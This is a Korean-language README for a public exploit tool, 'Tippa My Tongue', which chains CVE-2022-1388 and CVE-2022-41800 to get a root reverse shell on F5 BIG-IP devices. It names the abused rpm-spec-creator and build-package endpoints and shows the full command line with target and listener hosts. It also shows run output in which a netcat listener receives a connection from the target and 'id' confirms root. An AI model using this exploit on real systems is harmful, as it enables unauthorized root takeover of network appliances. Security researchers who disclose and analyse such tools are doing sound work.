
CVE-2022-1388 및 CVE-2022-41800을 사용한 F5 BIG-IP 익스플로잇
Tippa My Tongue은 CVE-2022-1388 및 CVE-2022-41800을 사용하여 F5 BIG-IP 제품에 root 리버스 셸을 설정하는 익스플로잇입니다. 대부분의 CVE-2022-1388 익스플로잇은 /mgmt/tm/util/bash를 사용하여 코드 실행을 달성합니다. 그러나 이 익스플로잇은 /mgmt/shared/iapp/rpm-spec-creator를 사용한 후 /mgmt/shared/iapp/build-package를 사용합니다. 이 접근 방식은 Ron Bowes가 이 AttackerKB 분석에서 처음 제안했습니다. 하지만 제가 알기로는 이와 같은 방식의 CVE-2022-1388 익스플로잇을 공개한 사람은 없었습니다.
자세한 내용은 VulnCheck 게시물을 참조하세요.
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194
▄▄▄▄▄▪ ▄▄▄· ▄▄▄· ▄▄▄· • ▌ ▄ ·. ▄· ▄
•██ ██ ▐█ ▄█▐█ ▄█▐█ ▀█ ·██ ▐███▪▐█▪██
▐█.▪▐█· ██▀· ██▀·▄█▀▀█ ▐█ ▌▐▌▐█·▐█▌▐█▪
▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌ ██ ██▌▐█▌ ▐█▀·.
▀▀▀ ▀▀▀.▀ .▀ ▀ ▀ ▀▀ █▪▀▀▀ ▀ •
▄▄▄▄▄ ▐ ▄ ▄▄ • ▄• ▄▌▄▄▄ .
•██ ▪ •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
▀▀▀ ▀█▄▀▪▀▀ █▪·▀▀▀▀ ▀▀▀ ▀▀▀
CVE-2022-1388
CVE-2022-41800
🦞
[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #